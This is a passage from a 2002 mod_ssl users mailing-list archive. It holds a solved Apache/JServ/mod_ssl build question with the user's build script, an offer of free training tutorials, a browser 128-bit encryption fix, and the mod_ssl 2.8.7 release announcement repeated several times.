14:51:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1N8wGV51720; Sat, 23 Feb 2002 09:58:16 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from digexch1.digarch.com id XAA27531; Fri, 22 Feb 2002 23:45:47 +0100 (MET) Received: from chorazin.digarch.com (CHORAZIN [10.5.1.149]) by digexch1.digarch.com with SMTP (Microsoft Exchange Internet Mail Service Version 5.5.2653.13) id CWKBKSJ2; Fri, 22 Feb 2002 16:45:15 -0600 Message-Id: <5.1.0.14.0.20020222163708.00a49800@digexch1> X-Sender: jburgess@digexch1 (Unverified) X-Mailer: QUALCOMM Windows Eudora Version 5.1 Date: Fri, 22 Feb 2002 16:45:18 -0600 To: modssl-users@modssl.org From: Jay Burgess Subject: RE: SSL-enabled Apache with another module (SOLVED) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii"; format=flowed Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Jay Burgess X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Carlos, thanks again for the input. Once you confirmed that my build script was O.K., I was able to turn my attention back to JServ and I found the problem. Not mod_ssl-related. Sorry for the noise. Jay >Date: Fri, 22 Feb 2002 15:26:44 -0600 >To: modssl-users@modssl.org >From: Jay Burgess >Subject: RE: SSL-enabled Apache with another module > >Thanks for the reply. I did forget to mention in my previous post that >mod_jserv.c appears to be correctly compiled into Apache (as shown via >"httpd -l"). I'll re-check the server signature in a few minutes, after >my latest rebuild completes. > >With regards to the configuration details, I don't believe that there are >any problems there, as Apache+JServ has worked fine for me almost a year >now. I only started having trouble when I tried to incorporate mod_ssl >into the build process. Funnily enough, if I build Apache+mod_ssl, >without JServ, that also works fine. It's only the combination of the >three that isn't working. > >I'll re-look at the "--enable-shared=ssl" difference that you mention, and >see if maybe that's it. > >Finally, I do now think it's a JServ problem, not a mod_ssl issue. I just >needed to start somewhere, and since mod_ssl was the new piece of the >puzzle, I was looking for confirmation from a mod_ssl user that I appeared >to be doing it right. > >Thanks again. > >Jay > > > -----Original Message----- > > From: Carlos Ramirez [mailto:ramirezc@roses.bna.boeing.com] > > Sent: Friday, February 22, 2002 1:02 PM > > To: modssl-users@modssl.org > > Subject: Re: SSL-enabled Apache with another module > > > > > > Verify that you actually do have Jserv built into your httpd. You can > > either execute: /Apache/1.3.20/bin/httpd -l or look at your server > > signature which should look something like this: > > Apache/1.3.22 (Unix) ApacheJServ/1.1.2 mod_perl/1.26 mod_ssl/2.8.5 > > OpenSSL/0.9.6c > > > > Have you included the path to your jserv.conf file in your httpd.conf? > > Your httpd.conf file should include the following line: > > Include /usr/local/etc/jserv1.1.2/etc/jserv.conf > > > > The only difference between my build process and yours is that I don't > > do the shared thing i.e. I don't include the --enable-shared=ssl > > > > hhmmm...somehow this didn't feel like modssl related... > > > > -Carlos > > > > Jay Burgess wrote: > > > > > > I'm struggling to get Apache built on Solaris with both mod_ssl and > > > JServ. I've had no trouble building an SSL-only Apache, > > and I've had a > > > JServ-only Apache running for a year, but trying to get > > them both together > > > in Apache together is causing me all kinds of trouble. > > (Apache starts up > > > fine in SSL mode, but JServ never starts. And, there's no > > log information > > > of any kind produced.) > > > > > > I've included my complete build script below in case anyone > > sees anything > > > that doesn't look right. My UNIX skills are marginal at > > best, so I've > > > built this script with a lot of cut and pasting from online > > docs, etc. I'm > > > assuming I've got some configure option wrong, but I sure > > don't see it. > > > > > > Any guidance you can provide would be much appreciated. > > Thanks in advance. > > > > > > Here's my script: > > > > > > echo > > "*****************************************************************" > > > echo "[1] Configure and make Apache" > > > echo > > "*****************************************************************" > > > cd /Apache/1.3.20 > > > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ > > > --prefix=/Apache/1.3.20 > > > gmake > > > gmake install > > > > > > echo > > "*****************************************************************" > > > echo "[2] Configure and build OpenSSL" > > > echo > > "*****************************************************************" > > > cd /Apache/openssl-0.9.6b > > > sh config no-threads > > > gmake > > > gmake test > > > > > > echo > > "*****************************************************************" > > > echo "[3] Add mod_ssl to Apache" > > > echo > > "*****************************************************************" > > > cd /Apache/mod_ssl-2.8.4-1.3.20 > > > ./configure --with-apache=/Apache/1.3.20 > > > > > > echo > > "*****************************************************************" > > > echo "[4] Configure and make JServ" > > > echo > > "*****************************************************************" > > > cd /Apache/ApacheJServ-1.1.2 > > > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" ./configure \ > > > --prefix=/Apache/ApacheJServ-1.1.2 \ > > > --with-apache-src=/Apache/1.3.20 \ > > > --with-jdk-home=/usr/java1.2 \ > > > --with-JSDK=/Apache/jsdk2.0/lib/jsdk.jar > > > gmake > > > gmake install > > > > > > echo > > "*****************************************************************" > > > echo "[5] Reconfigure Apache (with JServ and SSL)" > > > echo > > "*****************************************************************" > > > cd /Apache/1.3.20 > > > CC="/usr/local/bin/gcc" MAKE="/usr/local/bin/gmake" > > > SSL_BASE=/Apache/openssl-0.9.6b ./configure \ > > > --prefix=/Apache/1.3.20 \ > > > --enable-module=ssl \ > > > --enable-shared=ssl \ > > > --activate-module=src/modules/jserv/libjserv.a > > > > > > echo > > "*****************************************************************" > > > echo "[6] Remake Apache" > > > echo > > "*****************************************************************" > > > cd /Apache/1.3.20 > > > gmake > > > gmake certificate > > > gmake install > > > > > > Jay > > > > > ______________________________________________________________________ > > > Apache Interface to OpenSSL (mod_ssl) >www.modssl.org > > User Support Mailing List modssl-users@modssl.org > > Automated List Manager majordomo@modssl.org > >-- >------------------------------------------------------------------------- >Carlos Ramirez + Boeing + Human Flight & Space Exploration + >714.372.4181 >------------------------------------------------------------------------- ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 20:25:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA00269; Sat, 23 Feb 2002 20:24:29 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id UAA00165; Sat, 23 Feb 2002 20:23:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 32FA04CE637; Sat, 23 Feb 2002 20:23:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g1NIFNS72283; Sat, 23 Feb 2002 19:15:23 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mta03.mail.mel.aone.net.au id SAA13475; Sat, 23 Feb 2002 18:22:24 +0100 (MET) Received: from postgresql.org ([63.34.218.156]) by mta03.mail.mel.aone.net.au with ESMTP id <20020223172216.OUNP25516.mta03.mail.mel.aone.net.au@postgresql.org> for ; Sun, 24 Feb 2002 04:22:16 +1100 Message-ID: <3C77CF4B.DD876481@postgresql.org> Date: Sun, 24 Feb 2002 04:20:11 +1100 From: Justin Clift X-Mailer: Mozilla 4.78 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: mod_ssl Mailing List Subject: CBT Series on mod_ssl needed? Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Justin Clift X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi everyone, Just wondering if there would be a use if I started creating a free series of Computer Based Training tutorials for mod_ssl, similar to the series I've started for PostgreSQL : http://techdocs.postgresql.org/college/ These are Flash based animations (about 200k) which explain some of the basic concepts of PostgreSQL. So far, the feedback about them is really positive and I'm looking at other Open Source projects which would benefit (as well as continuing the PostgreSQL series). :-) Regards and best wishes, Justin Clift -- "My grandfather once told me that there are two kinds of people: those who work and those who take the credit. He told me to try to be in the first group; there was less competition there." - Indira Gandhi ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 20:26:13 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id UAA00419; Sat, 23 Feb 2002 20:25:38 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from visp.engelschall.com id UAA00167; Sat, 23 Feb 2002 20:23:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 400044CE697; Sat, 23 Feb 2002 20:23:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g1NJMFd88717; Sat, 23 Feb 2002 20:22:15 +0100 (CET) Date: Sat, 23 Feb 2002 20:22:15 +0100 From: "Ralf S. Engelschall" To: modssl-announce@modssl.org, modssl-users@modssl.org Subject: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 Message-ID: <20020223192215.GA88696@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES entries follow for your convinience. Fetch it from: o http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.7 (01-Feb-2002 to 23-Feb-2002) *) Support for the latest OpenSSL 0.9.7 snapshots. *) Fixed potential buffer overflow in DBM and SHMHT session cache if very very large certificate chains are used. *) Compliance with POSIX 1003.1-2001 (SUSv3) by replacing obsolete "head -1" and "tail -1" constructs with sed variants in scripts. *) Fixed file descriptor leakage under Win32. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sat Feb 23 21:36:19 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id VAA08534; Sat, 23 Feb 2002 21:35:34 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from zarathustra.voxel.net id VAA08226; Sat, 23 Feb 2002 21:33:22 +0100 (MET) Received: from grayskies by zarathustra.voxel.net with spam-scanned (Exim 3.35 #1) id 16eir6-000GPA-00; Sat, 23 Feb 2002 15:33:18 -0500 Received: from mmx.engelschall.com ([195.27.130.252]) by zarathustra.voxel.net with esmtp (Exim 3.35 #1) id 16eir4-000GP4-00 for david@grayskies.net; Sat, 23 Feb 2002 15:33:16 -0500 Received: by mmx.engelschall.com (Postfix/smtpfeed 1.16) id DDD851938A; Sat, 23 Feb 2002 21:31:17 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 9286C1930B for ; Sat, 23 Feb 2002 21:31:17 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-announce-L id VAA07863; Sat, 23 Feb 2002 21:30:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA07730; Sat, 23 Feb 2002 21:29:27 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 50A874CE729; Sat, 23 Feb 2002 21:29:26 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-announce@modssl.org id g1NJaK289314; Sat, 23 Feb 2002 20:36:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from visp.engelschall.com id UAA00167; Sat, 23 Feb 2002 20:23:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 400044CE697; Sat, 23 Feb 2002 20:23:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g1NJMFd88717; Sat, 23 Feb 2002 20:22:15 +0100 (CET) Date: Sat, 23 Feb 2002 20:22:15 +0100 From: "Ralf S. Engelschall" To: modssl-announce@modssl.org, modssl-users@modssl.org Subject: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 Message-ID: <20020223192215.GA88696@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-announce X-Spam-Status: No, hits=0.0 required=5.0 tests= version=2.01 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES entries follow for your convinience. Fetch it from: o http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.7 (01-Feb-2002 to 23-Feb-2002) *) Support for the latest OpenSSL 0.9.7 snapshots. *) Fixed potential buffer overflow in DBM and SHMHT session cache if very very large certificate chains are used. *) Compliance with POSIX 1003.1-2001 (SUSv3) by replacing obsolete "head -1" and "tail -1" constructs with sed variants in scripts. *) Fixed file descriptor leakage under Win32. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 03:06:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id DAA16446; Sun, 24 Feb 2002 03:05:41 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web10001.mail.yahoo.com id DAA16226; Sun, 24 Feb 2002 03:03:35 +0100 (MET) Message-ID: <20020224010332.37040.qmail@web10001.mail.yahoo.com> Received: from [200.73.61.203] by web10001.mail.yahoo.com via HTTP; Sat, 23 Feb 2002 17:03:32 PST Date: Sat, 23 Feb 2002 17:03:32 -0800 (PST) From: Pablo Silva Subject: Re: Global ID for IE 5.0 NN 4.5 on Win98 dosen't works To: modssl-users@modssl.org In-Reply-To: MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Pablo Silva X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hi Mikey ! You have rigth!, I forget the step about tag my certificate make myself for NN and IE. When I pathed NN with fortify it worked!, about IE (my version is for spanish people), only I downloaded the patch from Microsoft and worked!! Hurra...AL FIN!!! :-D The web page about the patch for 128 bits you can find in microsoft, depends of your language-configuration and version of IE, that's: http://www.microsoft.com/windows/ie/downloads/recommended/128bit/default.asp I don't know why microsoft offer this patch, when early time only US citizen in USA, could to use 128 bits. Well, thanks for your suggestion. All of the days I learn new things.. -Pablo --- mike.innes@Oneaccount.com wrote: > > Pablo, > Did you make the server cerificate yourself? > Assuming you flagged it > for IE and NC global_id if so then the browser will > only step-up to strong > (128bit) encryption if the certificate that signed > it is also in the > browser and has been flagged as a server-gated CA > certificate, if you > import the CA certificate into your browser then it > will lose the > server-gated flag. AFAIK the only way to flag a CA > certificate as > server-gated is to run a patching program after > installing the CA > certificate into the browser (IE dev kit?). There's > some more info in the > MOD_SSL docs about this. > If you bought the GLOBAL_ID certificate (from > Verisign/thawte etc) but > it does not step up then the most likely thing is > that you have not > installed an intermediate CA certificate into > Apache/MOD_SSL, this is a > common mistake - also note this is the > SSLCertificateChainFile directive. > The reason why your Linux 4.75 gives strong > encryption is probably > because it is not encryption crippled (Help... About > Communicator, does is > say "This version supports U.S. security" and you > won't get 40bit unless > you turn off the ciphers in the browser or server. > Mikey > __________________________________________________ Do You Yahoo!? Yahoo! Sports - Coverage of the 2002 Olympic Games http://sports.yahoo.com ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 10:35:03 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA07723; Sun, 24 Feb 2002 10:33:06 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from fe040.worldonline.dk id KAA07406; Sun, 24 Feb 2002 10:31:47 +0100 (MET) Received: (qmail 22931 invoked by uid 0); 24 Feb 2002 09:31:39 -0000 Received: from 213.237.13.224.adsl.hc.worldonline.dk (HELO NEIGAARD?MOB) (213.237.13.224) by fe040.worldonline.dk with SMTP; 24 Feb 2002 09:31:39 -0000 Date: Sun, 24 Feb 2002 10:30:42 +0100 From: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-Mailer: The Bat! (v1.53d) X-Priority: 3 (Normal) Message-ID: <169936015.20020224103042@e-box.dk> To: Justin Clift Subject: Re: CBT Series on mod_ssl needed? In-Reply-To: <3C77CF4B.DD876481@postgresql.org> References: <3C77CF4B.DD876481@postgresql.org> MIME-Version: 1.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: =?ISO-8859-1?B?U/hyZW4gTmVpZ2FhcmQ=?= X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Saturday, February 23, 2002, 6:20:11 PM, Justin wrote: JC> Hi everyone, JC> Just wondering if there would be a use if I started creating a free JC> series of Computer Based Training tutorials for mod_ssl, similar to the JC> series I've started for PostgreSQL : JC> http://techdocs.postgresql.org/college/ JC> These are Flash based animations (about 200k) which explain some of the JC> basic concepts of PostgreSQL. So far, the feedback about them is really JC> positive and I'm looking at other Open Source projects which would JC> benefit (as well as continuing the PostgreSQL series). I'm new to mod_ssl and SSL in general, and I would say YES please, that would be really nice :) What do you think those tutorials would cover? I have been reading the documentation, but for me it isn't easy at all. The documentation covers all the configuration of mod_ssl, but I really don't know what happens when I start my mod_ssl-Apache server, or even if there is more than one way to start it. Also I don't know how I add users/passwords to a server or VirtualHost, so that only those users has access. I don't know if this is too basic, or what you had in mind, but the idea sounds GREATH to a newbie like me :) And I also know that if I ask these really basic questions here, I upset a lot of people, so I have my fingers crossed for a nice tutorial :) -- Med venlig hilsen/Best regards, Søren Neigaard mailto:neigaard@e-box.dk ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 10:36:12 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id KAA08039; Sun, 24 Feb 2002 10:35:15 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from zarathustra.voxel.net id KAA07433; Sun, 24 Feb 2002 10:31:53 +0100 (MET) Received: from grayskies by zarathustra.voxel.net with spam-scanned (Exim 3.35 #1) id 16ev0W-000HAI-00; Sun, 24 Feb 2002 04:31:49 -0500 Received: from mmx.engelschall.com ([195.27.130.252]) by zarathustra.voxel.net with esmtp (Exim 3.35 #1) id 16ev0U-000HAC-00 for david@grayskies.net; Sun, 24 Feb 2002 04:31:47 -0500 Received: by mmx.engelschall.com (Postfix/smtpfeed 1.16) id 503B019388; Sun, 24 Feb 2002 10:30:16 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 1AE8F19345 for ; Sun, 24 Feb 2002 10:30:16 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-announce-L id KAA07128; Sun, 24 Feb 2002 10:29:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA07026; Sun, 24 Feb 2002 10:28:13 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 731E64CE731; Sun, 24 Feb 2002 10:28:12 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-announce@modssl.org id g1O9Qpw06784; Sun, 24 Feb 2002 10:26:51 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from zarathustra.voxel.net id VAA08226; Sat, 23 Feb 2002 21:33:22 +0100 (MET) Received: from grayskies by zarathustra.voxel.net with spam-scanned (Exim 3.35 #1) id 16eir6-000GPA-00; Sat, 23 Feb 2002 15:33:18 -0500 Received: from mmx.engelschall.com ([195.27.130.252]) by zarathustra.voxel.net with esmtp (Exim 3.35 #1) id 16eir4-000GP4-00 for david@grayskies.net; Sat, 23 Feb 2002 15:33:16 -0500 Received: by mmx.engelschall.com (Postfix/smtpfeed 1.16) id DDD851938A; Sat, 23 Feb 2002 21:31:17 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 9286C1930B for ; Sat, 23 Feb 2002 21:31:17 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-announce-L id VAA07863; Sat, 23 Feb 2002 21:30:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA07730; Sat, 23 Feb 2002 21:29:27 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 50A874CE729; Sat, 23 Feb 2002 21:29:26 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-announce@modssl.org id g1NJaK289314; Sat, 23 Feb 2002 20:36:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from visp.engelschall.com id UAA00167; Sat, 23 Feb 2002 20:23:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 400044CE697; Sat, 23 Feb 2002 20:23:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g1NJMFd88717; Sat, 23 Feb 2002 20:22:15 +0100 (CET) Date: Sat, 23 Feb 2002 20:22:15 +0100 From: "Ralf S. Engelschall" To: modssl-announce@modssl.org, modssl-users@modssl.org Subject: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 Message-ID: <20020223192215.GA88696@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-announce X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-announce X-Spam-Status: No, hits=0.0 required=5.0 tests= version=2.01 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES entries follow for your convinience. Fetch it from: o http://www.modssl.org/source/ o ftp://ftp.modssl.org/source/ Yours, Ralf S. Engelschall rse@engelschall.com www.engelschall.com Changes with mod_ssl 2.8.7 (01-Feb-2002 to 23-Feb-2002) *) Support for the latest OpenSSL 0.9.7 snapshots. *) Fixed potential buffer overflow in DBM and SHMHT session cache if very very large certificate chains are used. *) Compliance with POSIX 1003.1-2001 (SUSv3) by replacing obsolete "head -1" and "tail -1" constructs with sed variants in scripts. *) Fixed file descriptor leakage under Win32. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org Official Announcement Mailing List modssl-announce@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Sun Feb 24 11:37:50 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id LAA14399; Sun, 24 Feb 2002 11:37:05 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from zarathustra.voxel.net id LAA14202; Sun, 24 Feb 2002 11:35:22 +0100 (MET) Received: from grayskies by zarathustra.voxel.net with spam-scanned (Exim 3.35 #1) id 16evyh-000HBa-00; Sun, 24 Feb 2002 05:34:00 -0500 Received: from mmx.engelschall.com ([195.27.130.252]) by zarathustra.voxel.net with esmtp (Exim 3.35 #1) id 16evyg-000HBU-00 for david@grayskies.net; Sun, 24 Feb 2002 05:33:59 -0500 Received: by mmx.engelschall.com (Postfix/smtpfeed 1.16) id 503B019388; Sun, 24 Feb 2002 10:30:16 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 1AE8F19345 for ; Sun, 24 Feb 2002 10:30:16 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-announce-L id KAA07128; Sun, 24 Feb 2002 10:29:20 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id KAA07026; Sun, 24 Feb 2002 10:28:13 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 731E64CE731; Sun, 24 Feb 2002 10:28:12 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-announce@modssl.org id g1O9Qpw06784; Sun, 24 Feb 2002 10:26:51 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from zarathustra.voxel.net id VAA08226; Sat, 23 Feb 2002 21:33:22 +0100 (MET) Received: from grayskies by zarathustra.voxel.net with spam-scanned (Exim 3.35 #1) id 16eir6-000GPA-00; Sat, 23 Feb 2002 15:33:18 -0500 Received: from mmx.engelschall.com ([195.27.130.252]) by zarathustra.voxel.net with esmtp (Exim 3.35 #1) id 16eir4-000GP4-00 for david@grayskies.net; Sat, 23 Feb 2002 15:33:16 -0500 Received: by mmx.engelschall.com (Postfix/smtpfeed 1.16) id DDD851938A; Sat, 23 Feb 2002 21:31:17 +0100 (CET) Received: from opensource.ee.ethz.ch (opensource-01.ee.ethz.ch [129.132.7.153]) by mmx.engelschall.com (Postfix) with ESMTP id 9286C1930B for ; Sat, 23 Feb 2002 21:31:17 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-announce-L id VAA07863; Sat, 23 Feb 2002 21:30:30 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id VAA07730; Sat, 23 Feb 2002 21:29:27 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 50A874CE729; Sat, 23 Feb 2002 21:29:26 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-announce@modssl.org id g1NJaK289314; Sat, 23 Feb 2002 20:36:20 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP from visp.engelschall.com id UAA00167; Sat, 23 Feb 2002 20:23:30 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id 400044CE697; Sat, 23 Feb 2002 20:23:30 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) id g1NJMFd88717; Sat, 23 Feb 2002 20:22:15 +0100 (CET) Date: Sat, 23 Feb 2002 20:22:15 +0100 From: "Ralf S. Engelschall" To: modssl-announce@modssl.org, modssl-users@modssl.org Subject: [ANNOUNCE] mod_ssl 2.8.7-1.3.23 Message-ID: <20020223192215.GA88696@engelschall.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.3.24i Organization: Engelschall, Germany. X-Web-Homepage: http://www.engelschall.com/ X-PGP-Public-Key: https://www.engelschall.com/ho/rse/pgprse.asc X-PGP-Fingerprint: 00 C9 21 8E D1 AB 70 37 DD 67 A2 3A 0A 6F 8D A5 X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-announce X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-announce X-Spam-Status: No, hits=0.0 required=5.0 tests= version=2.01 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Ralf S. Engelschall" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Another little round in maintaining mod_ssl 2.x for Apache 1.3.x brings to you today mod_ssl 2.8.7 for Apache 1.3.23. The corresponding CHANGES entries follow for your convinience. Fetch it from: o 